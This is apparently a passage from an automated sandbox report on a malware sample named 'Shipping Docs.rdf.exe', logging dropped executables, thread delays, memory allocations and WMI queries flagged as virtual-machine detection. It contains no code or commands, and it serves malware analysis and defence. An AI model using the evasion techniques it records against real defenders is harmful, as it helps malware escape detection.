Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Shipping Docs.rdf.exe PID: 1664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SVcPIbJno.exe PID: 7428, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: 1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: 1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: 7A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: 8A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: 8BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Memory allocated: 9BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: 29A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: 49A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: 74D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: 84D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: 8670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Memory allocated: 9670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: E50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 2A20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 29E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Memory allocated: 11A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3397	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 989	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2197	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 4063

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe TID: 7036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5568	Thread sleep count: 3397 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7336	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 7448	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98455	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98745
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98421
